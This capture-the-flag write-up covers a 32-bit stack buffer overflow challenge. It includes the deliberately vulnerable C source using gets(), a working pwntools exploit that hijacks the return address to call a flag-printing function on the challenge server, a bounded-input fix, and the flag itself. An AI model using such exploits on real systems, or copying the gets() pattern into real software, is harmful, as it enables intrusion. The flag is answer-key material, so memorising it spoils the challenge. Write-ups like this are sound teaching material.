Tags: bof pwn 

The source code is given:
```c
#include "stdio.h"
#include "string.h"
#include "stdlib.h"

// gcc -m32 -fno-stack-protector -no-pie bof.c -o bof

void audition(int time, int room_num){
    char* flag = "/bin/cat flag.txt";
    if(time == 1200 && room_num == 366){
        system(flag);
    }
}

void get_audition_info(){
    char name[50];
    char song[50];
    printf("What's your name?\n");
    gets(name);
    printf("What song will you be singing?\n");
    gets(song);
}

void welcome(){
    printf("Welcome to East High!\n");
    printf("We're the Wildcats and getting ready for our spring musical\n");
    printf("We're now accepting signups for auditions!\n");
}

int main(){
    welcome();
    get_audition_info();
    return 0;
}
```

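Neither of the two inputs is bounded (both are read with `gets()`), so we have a stack buffer overflow.
Because this is a 32-bit binary, function arguments are passed on the stack, so we can ROP into the `audition()` function by overwriting the return address and placing its 2 parameters on the stack after it.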

Exploit:
```python
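from pwn import *

e = ELF('./bof')

payload = b'A' * 112                    # padding up to the saved return address
payload += p32(e.symbols['audition'])   # return into audition()
payload += b'B' * 4                     # placeholder return address for audition()
payload += p32(0x4B0)                   # time == 1200
payload += p32(0x16E)                   # room_num == 366

p = remote('ctf.umbccd.io', 4000)
#p = process('./bof')
print(p.recvuntil(b'?\n').decode())
p.sendline(b'A')                        # first prompt: any short name
print(p.recvuntil(b'?\n').decode())
p.sendline(payload)                     # second prompt: the overflowing input
p.interactive()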
```
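The fix for the two unbounded `gets()` calls, as an added example that is not part of the original writeup or the challenge source: a bounded line reader that rejects overlong input and drains the rest of the line, used in a rewritten `get_audition_info()`. The names `read_field`, `FIELD_LEN` and `audition_with_input` are hypothetical, and the helper only feeds a constructed string as input.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_LEN 50 /* same size as name[] and song[] in the challenge */

/* Read one line into buf (cap bytes, NUL-terminated on success).
 * Returns the line length, or -1 on EOF/error or when the line does not fit.
 * An overlong line is drained so its tail is not taken as the next answer. */
static int read_field(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {            /* the whole line fit */
        buf[len] = '\0';
        return (int)len;
    }
    int c = fgetc(in);                 /* no newline stored: check what follows */
    if (c == '\n' || c == EOF)
        return (int)len;               /* exactly cap-1 chars, or unterminated last line */
    while (c != '\n' && c != EOF)      /* too long: discard the rest of the line */
        c = fgetc(in);
    buf[0] = '\0';
    return -1;
}

/* Bounded version of get_audition_info(); returns 0 if both answers fit. */
int get_audition_info(FILE *in)
{
    char name[FIELD_LEN];
    char song[FIELD_LEN];
    printf("What's your name?\n");
    if (read_field(in, name, sizeof name) < 0) return -1;
    printf("What song will you be singing?\n");
    if (read_field(in, song, sizeof song) < 0) return -1;
    return 0;
}

/* Hypothetical demo helper: feed a constructed string as the program's input. */
int audition_with_input(const char *input)
{
    FILE *f = tmpfile();
    if (f == NULL) return -2;
    fputs(input, f);
    rewind(f);
    int rc = get_audition_info(f);
    fclose(f);
    return rc;
}

int main(void) { return get_audition_info(stdin) == 0 ? 0 : 1; }
```

With the reads bounded, no input length can reach the saved return address. Building without `-fno-stack-protector` and `-no-pie` would add further layers on top of this fix.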

# FLAG
`DawgCTF{wh@t_teAm?}`

Original writeup (https://github.com/Internaut401/CTF_Writeup/blob/master/2020/DawgCTF/bof%20of%20the%20top.md).